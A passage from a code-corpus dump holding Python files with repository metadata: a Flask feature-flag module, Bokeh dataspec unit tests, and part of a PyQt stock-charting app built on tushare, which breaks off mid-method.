elif num < -1000000:
result = 'large ' + result
print(result)
| 18.428571
| 34
| 0.534884
|
5971a987a5ac227b07dcd247b25cd28bc4908dd0
| 7,046
|
py
|
Python
|
flask_pancake/flags.py
|
NicMul/flask-pancake
|
f3f898e2d7c22581aa892280a793a8bd0396d072
|
[
"MIT"
] | null | null | null |
flask_pancake/flags.py
|
NicMul/flask-pancake
|
f3f898e2d7c22581aa892280a793a8bd0396d072
|
[
"MIT"
] | null | null | null |
flask_pancake/flags.py
|
NicMul/flask-pancake
|
f3f898e2d7c22581aa892280a793a8bd0396d072
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
import abc
import random
from typing import TYPE_CHECKING, Dict, Generic, Optional, Tuple, TypeVar
from cached_property import cached_property
from flask import current_app
from .constants import EXTENSION_NAME, RAW_FALSE, RAW_TRUE
from .registry import registry
if TYPE_CHECKING:
from flask_redis import FlaskRedis
from .extension import FlaskPancake
from .utils import GroupFunc
__all__ = ["Flag", "Sample", "Switch"]
DEFAULT_TYPE = TypeVar("DEFAULT_TYPE")
class AbstractFlag(abc.ABC, Generic[DEFAULT_TYPE]):
name: str
default: DEFAULT_TYPE
extension: str
def __init__(
self, name: str, default: DEFAULT_TYPE, extension: Optional[str] = None
) -> None:
self.name = name
self.set_default(default)
self.extension = extension if extension is not None else EXTENSION_NAME
registry.register(self)
def set_default(self, default: DEFAULT_TYPE) -> None:
self.default = default
@property
def ext(self) -> "FlaskPancake":
return current_app.extensions[self.extension]
@property
def _redis_client(self) -> FlaskRedis:
return current_app.extensions[self.ext.redis_extension_name]
@cached_property
def key(self) -> str:
return f"{self.__class__.__name__.upper()}:{self.extension}:{self.name.upper()}"
@abc.abstractmethod
def is_active(self) -> bool:
raise NotImplementedError # pragma: no cover
def clear(self) -> None:
self._redis_client.delete(self.key)
class BaseFlag(AbstractFlag[bool], abc.ABC):
def set_default(self, default: bool) -> None:
if int(default) not in {0, 1}:
raise ValueError(
f"Default value for {self.__class__.__name__.lower()} {self.name} "
f"must be True or False."
)
super().set_default(default)
def is_active(self) -> bool:
self._redis_client.setnx(self.key, int(self.default))
return self._redis_client.get(self.key) == RAW_TRUE
def disable(self) -> None:
self._redis_client.set(self.key, 0)
def enable(self) -> None:
self._redis_client.set(self.key, 1)
class Flag(BaseFlag):
"""
A feature flag.
Flags are active (or not) on a per-request / user basis.
"""
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._keys: Dict[str, Tuple[str, str]] = {}
def _get_group_keys(self, group_id: str) -> Tuple[str, str]:
if group_id in self._keys:
return self._keys[group_id]
if self.ext.group_funcs is None:
raise RuntimeError(
f"No group_funcs defined on FlaskPancake extension '{self.extension}'. "
"If you don't have users or other types of groups in your application "
"and want a global flag to turn things on and off, use a `Switch` "
"instead."
)
if group_id not in self.ext.group_funcs:
raise RuntimeError(
f"Invalid group identifer '{group_id}'. This group doesn't seem to be "
f"registered in the FlaskPancake extension '{self.extension}'."
)
object_key = f"FLAG:{self.extension}:k:{group_id}:{self.name.upper()}"
tracking_key = f"FLAG:{self.extension}:t:{group_id}:{self.name.upper()}"
r = self._keys[group_id] = (object_key, tracking_key)
return r
def _get_object_key(
self, group_id: str, *, func: GroupFunc = None, object_id: str = None
):
object_key_prefix, _ = self._get_group_keys(group_id)
if object_id is None:
if func is None:
func = self.ext.group_funcs[group_id]
object_id = func()
if object_id is None:
return None
return f"{object_key_prefix}:{object_id}"
def is_active(self) -> bool:
if self.ext.group_funcs:
for group_id, func in self.ext.group_funcs.items():
object_key = self._get_object_key(group_id, func=func)
if object_key is not None:
value = self._redis_client.get(object_key)
if value == RAW_TRUE:
return True
elif value == RAW_FALSE:
return False
return super().is_active()
def _track_object(self, group_id: str, object_key: str):
self._redis_client.sadd(self._get_group_keys(group_id)[1], object_key)
def clear_group(self, group_id: str, *, object_id: str = None):
object_key = self._get_object_key(group_id, object_id=object_id)
if object_key is None:
raise RuntimeError(f"Cannot derive identifier for group '{group_id}'")
self._redis_client.delete(object_key)
self._redis_client.srem(self._get_group_keys(group_id)[1], object_key)
def clear_all_group(self, group_id: str) -> None:
_, tracking_key = self._get_group_keys(group_id)
object_keys = self._redis_client.smembers(tracking_key)
if object_keys:
self._redis_client.delete(*object_keys)
self._redis_client.srem(tracking_key, *object_keys)
def disable_group(self, group_id: str, *, object_id: str = None) -> None:
object_key = self._get_object_key(group_id, object_id=object_id)
if object_key is None:
raise RuntimeError(f"Cannot derive identifier for group '{group_id}'")
self._track_object(group_id, object_key)
self._redis_client.set(object_key, 0)
def enable_group(self, group_id: str, *, object_id: str = None) -> None:
object_key = self._get_object_key(group_id, object_id=object_id)
if object_key is None:
raise RuntimeError(f"Cannot derive identifier for group '{group_id}'")
self._track_object(group_id, object_key)
self._redis_client.set(object_key, 1)
class Switch(BaseFlag):
"""
A feature switch.
Switches are active or inactive, globally.
"""
class Sample(AbstractFlag[float]):
"""
A sample of users.
A sample is active some percentage of the time, but is not connected to users
or requests.
"""
def set_default(self, default: float) -> None:
if not (0 <= default <= 100):
raise ValueError(
f"Default value for sample {self.name} must be in the range [0, 100]."
)
super().set_default(default)
def is_active(self) -> bool:
self._redis_client.setnx(self.key, self.default)
value = self._redis_client.get(self.key)
return random.uniform(0, 100) <= float(value)
# def clear(self) -> None:
# self._redis_client.delete(self.key)
def set(self, value: float) -> None:
if not (0 <= value <= 100):
raise ValueError(
f"Value for sample {self.name} must be in the range [0, 100]."
)
self._redis_client.set(self.key, value)
| 33.712919
| 88
| 0.628726
|
c3ba6b7c8ac00df51c9c7f3205362a667a1dbecc
| 18,982
|
py
|
Python
|
tests/unit/bokeh/core/property/test_dataspec.py
|
timgates42/bokeh
|
fb8b07b838f4d07d520cfe899779a11bc89f3c77
|
[
"BSD-3-Clause"
] | 1
|
2015-01-31T14:42:39.000Z
|
2015-01-31T14:42:39.000Z
|
tests/unit/bokeh/core/property/test_dataspec.py
|
timgates42/bokeh
|
fb8b07b838f4d07d520cfe899779a11bc89f3c77
|
[
"BSD-3-Clause"
] | 1
|
2021-05-12T10:14:45.000Z
|
2021-05-12T10:14:45.000Z
|
tests/unit/bokeh/core/property/test_dataspec.py
|
timgates42/bokeh
|
fb8b07b838f4d07d520cfe899779a11bc89f3c77
|
[
"BSD-3-Clause"
] | 1
|
2021-03-04T05:23:36.000Z
|
2021-03-04T05:23:36.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import datetime
from copy import copy
# External imports
import numpy as np
# Bokeh imports
from bokeh._testing.util.api import verify_all
from bokeh.core.has_props import HasProps
# Module under test
import bokeh.core.property.dataspec as bcpd # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
ALL = (
'AngleSpec',
'ColorSpec',
'DataSpec',
'DataDistanceSpec',
'DistanceSpec',
'expr',
'field',
'FontSizeSpec',
'HatchPatternSpec',
'MarkerSpec',
'NumberSpec',
'ScreenDistanceSpec',
'StringSpec',
'UnitsSpec',
'value',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_strict_dataspec_key_values():
for typ in (bcpd.NumberSpec, bcpd.StringSpec, bcpd.FontSizeSpec, bcpd.ColorSpec, bcpd.DataDistanceSpec, bcpd.ScreenDistanceSpec):
class Foo(HasProps):
x = typ("x")
f = Foo()
with pytest.raises(ValueError):
f.x = dict(field="foo", units="junk")
def test_dataspec_dict_to_serializable():
for typ in (bcpd.NumberSpec, bcpd.StringSpec, bcpd.FontSizeSpec, bcpd.ColorSpec):
class Foo(HasProps):
x = typ("x")
foo = Foo(x=dict(field='foo'))
props = foo.properties_with_values(include_defaults=False)
assert props['x']['field'] == 'foo'
assert props['x'] is not foo.x
class Test_AngleSpec(object):
def test_default_none(self):
class Foo(HasProps):
x = bcpd.AngleSpec(None)
a = Foo()
assert a.x is None
assert a.x_units == 'rad'
a.x = 14
assert a.x == 14
assert a.x_units == 'rad'
def test_autocreate_no_parens(self):
class Foo(HasProps):
x = bcpd.AngleSpec
a = Foo()
assert a.x is None
assert a.x_units == 'rad'
a.x = 14
assert a.x == 14
assert a.x_units == 'rad'
def test_default_value(self):
class Foo(HasProps):
x = bcpd.AngleSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'rad'
def test_setting_dict_sets_units(self):
class Foo(HasProps):
x = bcpd.AngleSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'rad'
a.x = { 'value' : 180, 'units' : 'deg' }
assert a.x == { 'value' : 180 }
assert a.x_units == 'deg'
def test_setting_json_sets_units_keeps_dictness(self):
class Foo(HasProps):
x = bcpd.AngleSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'rad'
a.set_from_json('x', { 'value' : 180, 'units' : 'deg' })
assert a.x == 180
assert a.x_units == 'deg'
def test_setting_dict_does_not_modify_original_dict(self):
class Foo(HasProps):
x = bcpd.AngleSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'rad'
new_value = { 'value' : 180, 'units' : 'deg' }
new_value_copy = copy(new_value)
assert new_value_copy == new_value
a.x = new_value
assert a.x == { 'value' : 180 }
assert a.x_units == 'deg'
assert new_value_copy == new_value
class Test_ColorSpec(object):
def test_field(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
assert f.col == "colorfield"
assert desc.serializable_value(f) == {"field": "colorfield"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
def test_field_default(self):
class Foo(HasProps):
col = bcpd.ColorSpec(default="red")
desc = Foo.__dict__["col"]
f = Foo()
assert f.col == "red"
assert desc.serializable_value(f) == {"value": "red"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
def test_default_tuple(self):
class Foo(HasProps):
col = bcpd.ColorSpec(default=(128, 255, 124))
desc = Foo.__dict__["col"]
f = Foo()
assert f.col == (128, 255, 124)
assert desc.serializable_value(f) == {"value": "rgb(128, 255, 124)"}
def test_fixed_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("gray")
desc = Foo.__dict__["col"]
f = Foo()
assert f.col == "gray"
assert desc.serializable_value(f) == {"value": "gray"}
def test_named_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = "red"
assert f.col == "red"
assert desc.serializable_value(f) == {"value": "red"}
f.col = "forestgreen"
assert f.col == "forestgreen"
assert desc.serializable_value(f) == {"value": "forestgreen"}
def test_case_insensitive_named_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = "RED"
assert f.col == "RED"
assert desc.serializable_value(f) == {"value": "RED"}
f.col = "ForestGreen"
assert f.col == "ForestGreen"
assert desc.serializable_value(f) == {"value": "ForestGreen"}
def test_named_value_set_none(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = None
assert desc.serializable_value(f) == {"value": None}
def test_named_value_unset(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
assert desc.serializable_value(f) == {"field": "colorfield"}
def test_named_color_overriding_default(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = "forestgreen"
assert f.col == "forestgreen"
assert desc.serializable_value(f) == {"value": "forestgreen"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
def test_hex_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = "#FF004A"
assert f.col == "#FF004A"
assert desc.serializable_value(f) == {"value": "#FF004A"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
def test_tuple_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = (128, 200, 255)
assert f.col == (128, 200, 255)
assert desc.serializable_value(f) == {"value": "rgb(128, 200, 255)"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
f.col = (100, 150, 200, 0.5)
assert f.col == (100, 150, 200, 0.5)
assert desc.serializable_value(f) == {"value": "rgba(100, 150, 200, 0.5)"}
def test_set_dict(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = {"field": "myfield"}
assert f.col == {"field": "myfield"}
f.col = "field2"
assert f.col == "field2"
assert desc.serializable_value(f) == {"field": "field2"}
class Test_DataDistanceSpec(object):
def test_basic(self):
assert issubclass(bcpd.DataDistanceSpec, bcpd.UnitsSpec)
class Foo(HasProps):
x = bcpd.DataDistanceSpec("x")
foo = Foo(x=dict(field='foo'))
props = foo.properties_with_values(include_defaults=False)
assert props['x']['units'] == 'data'
assert props['x']['field'] == 'foo'
assert props['x'] is not foo.x
class Test_DistanceSpec(object):
def test_default_none(self):
class Foo(HasProps):
x = bcpd.DistanceSpec(None)
a = Foo()
assert a.x is None
assert a.x_units == 'data'
a.x = 14
assert a.x == 14
assert a.x_units == 'data'
def test_autocreate_no_parens(self):
class Foo(HasProps):
x = bcpd.DistanceSpec
a = Foo()
assert a.x is None
assert a.x_units == 'data'
a.x = 14
assert a.x == 14
assert a.x_units == 'data'
def test_default_value(self):
class Foo(HasProps):
x = bcpd.DistanceSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'data'
def test_field_function():
assert bcpd.field("foo") == dict(field="foo")
assert bcpd.field("foo", "junk") == dict(field="foo", transform="junk")
assert bcpd.field("foo", transform="junk") == dict(field="foo", transform="junk")
class Test_FontSizeSpec(object):
def test_font_size_from_string(self):
class Foo(HasProps):
x = bcpd.FontSizeSpec(default=None)
css_units = "%|em|ex|ch|ic|rem|vw|vh|vi|vb|vmin|vmax|cm|mm|q|in|pc|pt|px"
a = Foo()
assert a.x is None
for unit in css_units.split("|"):
v = '10%s' % unit
a.x = v
assert a.x == v
assert a.lookup('x').serializable_value(a) == dict(value=v)
v = '10.2%s' % unit
a.x = v
assert a.x == v
assert a.lookup('x').serializable_value(a) == dict(value=v)
f = '_10%s' % unit
a.x = f
assert a.x == f
assert a.lookup('x').serializable_value(a) == dict(field=f)
f = '_10.2%s' % unit
a.x = f
assert a.x == f
assert a.lookup('x').serializable_value(a) == dict(field=f)
for unit in css_units.upper().split("|"):
v = '10%s' % unit
a.x = v
assert a.x == v
assert a.lookup('x').serializable_value(a) == dict(value=v)
v = '10.2%s' % unit
a.x = v
assert a.x == v
assert a.lookup('x').serializable_value(a) == dict(value=v)
f = '_10%s' % unit
a.x = f
assert a.x == f
assert a.lookup('x').serializable_value(a) == dict(field=f)
f = '_10.2%s' % unit
a.x = f
assert a.x == f
assert a.lookup('x').serializable_value(a) == dict(field=f)
def test_bad_font_size_values(self):
class Foo(HasProps):
x = bcpd.FontSizeSpec(default=None)
a = Foo()
with pytest.raises(ValueError):
a.x = "6"
with pytest.raises(ValueError):
a.x = 6
with pytest.raises(ValueError):
a.x = ""
def test_fields(self):
class Foo(HasProps):
x = bcpd.FontSizeSpec(default=None)
a = Foo()
a.x = "_120"
assert a.x == "_120"
a.x = dict(field="_120")
assert a.x == dict(field="_120")
a.x = "foo"
assert a.x == "foo"
a.x = dict(field="foo")
assert a.x == dict(field="foo")
class Test_NumberSpec(object):
def test_field(self):
class Foo(HasProps):
x = bcpd.NumberSpec("xfield")
f = Foo()
assert f.x == "xfield"
assert Foo.__dict__["x"].serializable_value(f) == {"field": "xfield"}
f.x = "my_x"
assert f.x == "my_x"
assert Foo.__dict__["x"].serializable_value(f) == {"field": "my_x"}
def test_value(self):
class Foo(HasProps):
x = bcpd.NumberSpec("xfield")
f = Foo()
assert f.x == "xfield"
f.x = 12
assert f.x == 12
assert Foo.__dict__["x"].serializable_value(f) == {"value": 12}
f.x = 15
assert f.x == 15
assert Foo.__dict__["x"].serializable_value(f) == {"value": 15}
f.x = dict(value=32)
assert Foo.__dict__["x"].serializable_value(f) == {"value": 32}
f.x = None
assert Foo.__dict__["x"].serializable_value(f) is None
def tests_accepts_timedelta(self):
class Foo(HasProps):
dt = bcpd.NumberSpec("dt", accept_datetime=True)
ndt = bcpd.NumberSpec("ndt", accept_datetime=False)
f = Foo()
f.dt = datetime.timedelta(3, 54)
assert f.dt == 259254000.0
# counts as number.Real out of the box
f.dt = np.timedelta64(3000, "ms")
assert f.dt == np.timedelta64(3000, "ms")
f.ndt = datetime.timedelta(3, 54)
assert f.ndt == 259254000.0
# counts as number.Real out of the box
f.ndt = np.timedelta64(3000, "ms")
assert f.ndt == np.timedelta64(3000, "ms")
def tests_accepts_timedelta_with_pandas(self, pd):
class Foo(HasProps):
dt = bcpd.NumberSpec("dt", accept_datetime=True)
ndt = bcpd.NumberSpec("ndt", accept_datetime=False)
f = Foo()
# counts as number.Real out of the box
f.dt = pd.Timedelta("3000ms")
assert f.dt == 3000.0
f.ndt = pd.Timedelta("3000ms")
assert f.ndt == 3000.0
def test_accepts_datetime(self):
class Foo(HasProps):
dt = bcpd.NumberSpec("dt", accept_datetime=True)
ndt = bcpd.NumberSpec("ndt", accept_datetime=False)
f = Foo()
f.dt = datetime.datetime(2016, 5, 11)
assert f.dt == 1462924800000.0
f.dt = datetime.date(2016, 5, 11)
assert f.dt == 1462924800000.0
f.dt = np.datetime64("2016-05-11")
assert f.dt == 1462924800000.0
with pytest.raises(ValueError):
f.ndt = datetime.datetime(2016, 5, 11)
with pytest.raises(ValueError):
f.ndt = datetime.date(2016, 5, 11)
with pytest.raises(ValueError):
f.ndt = np.datetime64("2016-05-11")
def test_default(self):
class Foo(HasProps):
y = bcpd.NumberSpec(default=12)
f = Foo()
assert f.y == 12
assert Foo.__dict__["y"].serializable_value(f) == {"value": 12}
f.y = "y1"
assert f.y == "y1"
# Once we set a concrete value, the default is ignored, because it is unused
f.y = 32
assert f.y == 32
assert Foo.__dict__["y"].serializable_value(f) == {"value": 32}
def test_multiple_instances(self):
class Foo(HasProps):
x = bcpd.NumberSpec("xfield")
a = Foo()
b = Foo()
a.x = 13
b.x = 14
assert a.x == 13
assert b.x == 14
assert Foo.__dict__["x"].serializable_value(a) == {"value": 13}
assert Foo.__dict__["x"].serializable_value(b) == {"value": 14}
b.x = {"field": "x3"}
assert Foo.__dict__["x"].serializable_value(a) == {"value": 13}
assert Foo.__dict__["x"].serializable_value(b) == {"field": "x3"}
def test_autocreate_no_parens(self):
class Foo(HasProps):
x = bcpd.NumberSpec
a = Foo()
assert a.x is None
a.x = 14
assert a.x == 14
def test_set_from_json_keeps_mode(self):
class Foo(HasProps):
x = bcpd.NumberSpec(default=None)
a = Foo()
assert a.x is None
# set as a value
a.x = 14
assert a.x == 14
# set_from_json keeps the previous dict-ness or lack thereof
a.set_from_json('x', dict(value=16))
assert a.x == 16
# but regular assignment overwrites the previous dict-ness
a.x = dict(value=17)
assert a.x == dict(value=17)
# set as a field
a.x = "bar"
assert a.x == "bar"
# set_from_json keeps the previous dict-ness or lack thereof
a.set_from_json('x', dict(field="foo"))
assert a.x == "foo"
# but regular assignment overwrites the previous dict-ness
a.x = dict(field="baz")
assert a.x == dict(field="baz")
class Test_UnitSpec(object):
def test_basic(self):
assert issubclass(bcpd.ScreenDistanceSpec, bcpd.UnitsSpec)
class Foo(HasProps):
x = bcpd.ScreenDistanceSpec("x")
foo = Foo(x=dict(field='foo'))
props = foo.properties_with_values(include_defaults=False)
assert props['x']['units'] == 'screen'
assert props['x']['field'] == 'foo'
assert props['x'] is not foo.x
def test_strict_key_values(self):
class FooUnits(HasProps):
x = bcpd.DistanceSpec("x")
f = FooUnits()
f.x = dict(field="foo", units="screen")
with pytest.raises(ValueError):
f.x = dict(field="foo", units="junk", foo="crap")
class FooUnits(HasProps):
x = bcpd.AngleSpec("x")
f = FooUnits()
f.x = dict(field="foo", units="deg")
with pytest.raises(ValueError):
f.x = dict(field="foo", units="junk", foo="crap")
def test_value_function():
assert bcpd.value("foo") == dict(value="foo")
assert bcpd.value("foo", "junk") == dict(value="foo", transform="junk")
assert bcpd.value("foo", transform="junk") == dict(value="foo", transform="junk")
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
Test___all__ = verify_all(bcpd, ALL)
| 30.517685
| 133
| 0.513961
|
14246c0db8a46e55191fe8b4f8c495d953645b12
| 15,529
|
py
|
Python
|
Tuchart/main.py
|
zhy0313/TuChart
|
23116c5ac876b11e3434ef67064613dc977dd4c4
|
[
"MIT"
] | 1
|
2019-03-20T08:27:22.000Z
|
2019-03-20T08:27:22.000Z
|
build/lib/Tuchart/main.py
|
fasiondog/TuChart
|
23116c5ac876b11e3434ef67064613dc977dd4c4
|
[
"MIT"
] | null | null | null |
build/lib/Tuchart/main.py
|
fasiondog/TuChart
|
23116c5ac876b11e3434ef67064613dc977dd4c4
|
[
"MIT"
] | 3
|
2017-11-27T06:01:57.000Z
|
2019-03-21T14:53:14.000Z
|
#-*- coding:utf-8 -*-
from __future__ import print_function
import os,sys,sip,time
from datetime import datetime,timedelta
from qtpy.QtWidgets import QTreeWidgetItem,QMenu,QApplication,QAction,QMainWindow
from qtpy import QtGui,QtWidgets
from qtpy.QtCore import Qt,QUrl,QDate
from Graph import graphpage
from layout import Ui_MainWindow
from pandas import DataFrame as df
import pandas as pd
import tushare as ts
import cPickle
import json
list1 = []
class MyUi(QMainWindow):
def __init__(self):
super(MyUi, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
cwd = os.getcwd()
cwd = str(cwd)
if os.path.isfile(cwd+"/time"):
with open("time","r") as outfile:#reads current time
history = cPickle.load(outfile)
if (datetime.now()-history).total_seconds()<43200: #measures if time elapse>12 hours
print("Less than 12 hours. Loading previously saved Json...")
#with open("time","w") as infile: #update time
#cPickle.dump(datetime.now(),infile)
else:
print("More than 12 hours. Updating Json...")
data = ts.get_industry_classified()
#data.to_json(cwd + "/class.json", orient="columns")#writes class data so no need to call Tushare agian
with open("class.json","w+") as outfile:
cPickle.dump(data,outfile)
now = datetime.now()
with open("time", "w+") as outfile: #update time
cPickle.dump(now, outfile)
else:
print("No json found!") #If this is first time using tuchart in this directory
data = df()
data = ts.get_industry_classified()
#var = data.to_json(cwd+"/class.json",orient="columns")
with open('class.json', 'w+') as outfile: #records json
cPickle.dump(data, outfile)
now = datetime.now()
with open("time", "w+") as outfile:
cPickle.dump(now,outfile)
with open("class.json", "r") as infile: # reads current time
series = cPickle.load(infile)
#series = pd.read_json(cwd + "\\class.json")
#series = ts.get_industry_classified()
series = pd.DataFrame(series)
curdate = time.strftime("%Y/%m/%d") #gets current time to put into dateedit
dateobj = datetime.strptime(curdate, "%Y/%m/%d")#converts to datetime object
past = dateobj - timedelta(days = 7) #minus a week to start date
pasttime = datetime.strftime(past, "%Y/%m/%d")
QPast = QDate.fromString(pasttime,"yyyy/MM/dd") #convert to qtime so that widget accepts the values
Qcurdate = QDate.fromString(curdate,"yyyy/MM/dd")
list1 = series["c_name"].tolist() #Get industry categories. Filters out redundant ones
list1 = list(set(list1))
#w = database()
#zsparent = QTreeWidgetItem(self.ui.treeWidget)
#zsparent.setText(0,"股票指数")
#zsnames =["上证指数-sh","深圳成指-sz","沪深300指数-hs300","上证50-"]
zsparent = QTreeWidgetItem(self.ui.treeWidget)
zsparent.setText(0, "股票指数")
zsnames = ["上证指数-sh", "深圳成指-sz", "沪深300指数-hs300", "上证50-sz50", "中小板-zxb", "创业板-cyb"]
for k in zsnames:
child = QTreeWidgetItem(zsparent)
child.setText(0, k)
for j in list1:
parent = QTreeWidgetItem(self.ui.treeWidget) #populate treewidget with names
parent.setText(0,j)
var = series.loc[series["c_name"] == j]
list2 = var["code"].tolist()
name = var["name"].tolist()
#var = showcollection(i) #Display database items
for idx,val in enumerate(list2):
child = QTreeWidgetItem(parent)
child.setText(0, name[idx]+"-"+str(val))
#for i in Drag:
#grandson = QTreeWidgetItem(child) #Commented out because increases program response time
#grandson.setText(0, i)
#self.ui.treeWidget.itemDoubleClicked.connect(self.onClickItem) #Display Collection items
self.ui.treeWidget.setContextMenuPolicy(Qt.CustomContextMenu)
self.ui.treeWidget.customContextMenuRequested.connect(self.openMenu)
#self.ui.widget.setGeometry(QtCore.QRect(0, 30,1550, 861))
file_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "render.html")) #path to read html file
local_url = QUrl.fromLocalFile(file_path)
self.ui.widget.load(local_url)
self.ui.commandLinkButton.setFixedSize(50, 50)
self.ui.commandLinkButton.clicked.connect(self.classify) #when the arrow button is clicked, trigger events
#self.ui.commandLinkButton.clicked.connect(lambda action: self.classify(action, self.ui.treewidget))
# QSizePolicy
try:
retain_size = self.ui.dateEdit_2.sizePolicy()
retain_size.setRetainSizeWhenHidden(True)
self.ui.dateEdit_2.setSizePolicy(retain_size)
retain_size = self.ui.comboBox.sizePolicy()
retain_size.setRetainSizeWhenHidden(True)
self.ui.comboBox.setSizePolicy(retain_size)
retain_size = self.ui.label_2.sizePolicy()
retain_size.setRetainSizeWhenHidden(True)
self.ui.label_2.setSizePolicy(retain_size)
except AttributeError:
print("No PYQT5 Binding! Widgets might be deformed")
self.ui.dateEdit.setDate(QPast)
self.ui.dateEdit_2.setDate(Qcurdate)#populate widgets
self.ui.dateEdit.setCalendarPopup(True)
self.ui.dateEdit_2.setCalendarPopup(True)
self.ui.comboBox.addItems(["D", "W", "M", "5", "15", "30", "60"])
self.ui.treeWidget_2.setDragDropMode(self.ui.treeWidget_2.InternalMove)
self.ui.treeWidget_2.setContextMenuPolicy(Qt.CustomContextMenu)
self.ui.treeWidget_2.customContextMenuRequested.connect(self.openWidgetMenu)
#self.ui.toolbutton.clicked.connect(lambda action: self.graphmerge(action, CombineKeyword))
self.ui.combobox.currentIndexChanged.connect(self.modifycombo)
def modifycombo(self):
if self.ui.combobox.currentText()==u"复权": #if 复权 is selected, clear all existing queries to avoid value conflict
self.ui.label_2.show()
self.ui.dateEdit_2.show()
self.ui.comboBox.show()
self.ui.comboBox.clear()
self.ui.comboBox.addItems(["hfq", "qfq"])
self.ui.treeWidget_2.clear()
if self.ui.combobox.currentText()==u"K线":
self.ui.label_2.show()
self.ui.dateEdit_2.show()
self.ui.comboBox.show()
self.ui.comboBox.clear()
self.ui.comboBox.addItems(["D", "W", "M", "5", "15", "30", "60"])#same as above
self.ui.treeWidget_2.clear()
if self.ui.combobox.currentText()==u"分笔数据":
self.ui.comboBox.hide()
self.ui.label_2.hide()
self.ui.dateEdit_2.hide()
self.ui.treeWidget_2.clear()
if self.ui.combobox.currentText()==u"历史分钟":
self.ui.comboBox.show()
self.ui.comboBox.clear()
self.ui.comboBox.addItems(["1min","5min","15min","30min","60min"])
self.ui.label_2.hide()
self.ui.dateEdit_2.hide()
self.ui.treeWidget_2.clear()
if self.ui.combobox.currentText()==u"十大股东":
self.ui.comboBox.hide()
self.ui.label_2.hide()
self.ui.dateEdit_2.hide()
self.ui.treeWidget_2.clear()
def graphmerge(self, combineKeyword):
sth = ""
for i in combineKeyword:
if sth == "":
sth = sth + i
else :
sth = sth + "\n" + "&"+ "-"+i
list1 = sth
return sth
global CombineKeyword
CombineKeyword = []
self.ui.listwidget.clear() #combine stuff so that different graphs can be drawn together
def kstuff(self):
return 0
def openWidgetMenu(self,position):
indexes = self.ui.treeWidget_2.selectedIndexes()
item = self.ui.treeWidget_2.itemAt(position)
if item == None:
return
#item = self.ui.listWidget.itemAt(position)
if len(indexes) > 0:
menu = QMenu()
menu.addAction(QAction("Delete", menu,checkable = True))#This function is perhaps useless
#menu.triggered.connect(self.eraseItem)
item = self.ui.treeWidget_2.itemAt(position)
#collec = str(item.text())
menu.triggered.connect(lambda action: self.ListMethodSelected(action, item))
menu.exec_(self.ui.treeWidget_2.viewport().mapToGlobal(position))
def ListMethodSelected(self, action, item):
if action.text() == "Delete":
self.eraseItem()
if action.text() == "Combine":
global CombineKeyword
collec = str(item.text())
CombineKeyword.append(collec)#Useless function(maybe?)
list1 = [self.tr(collec)]
self.ui.listwidget.addItems(list1)
self.eraseItem()
def methodSelected(self, action, collec):
#print(action.text()) #Choice
#if (self.ui.treewidget.count() == 5):
# self.ui.label.setText("Maximum number of queries")
# return
#self.ui.label.setText("")
Choice = action.text()
Stock = collec
#print(collec) #Stock Name
#print(db_origin) #DataBase name
#list1 = [self.tr(Stock+"-"+Choice+"-"+db_origin)]
#self.ui.treewidget.addItems(list1)
parent = QTreeWidgetItem(self.ui.treeWidget_2)
parent.setText(0, Stock.decode("utf-8")+"-"+Choice)
font = QtGui.QFont("Times", 12, QtGui.QFont.Bold)
self.ui.treeWidget_2.setFont(font)
def eraseItem(self):
for x in self.ui.treeWidget_2.selectedItems():#delete with write click menu
#item = self.ui.treewidget.takeItem(self.ui.treewidget.currentRow())
sip.delete(x)
#item.delete
def classify(self, folder):
items = []
startdate = self.ui.dateEdit.date()
startdate = startdate.toPyDate()
startdate = startdate.strftime("%Y/%m/%d")#converts date from dateedit to tushare readable date
enddate = self.ui.dateEdit_2.date()
enddate = enddate.toPyDate()
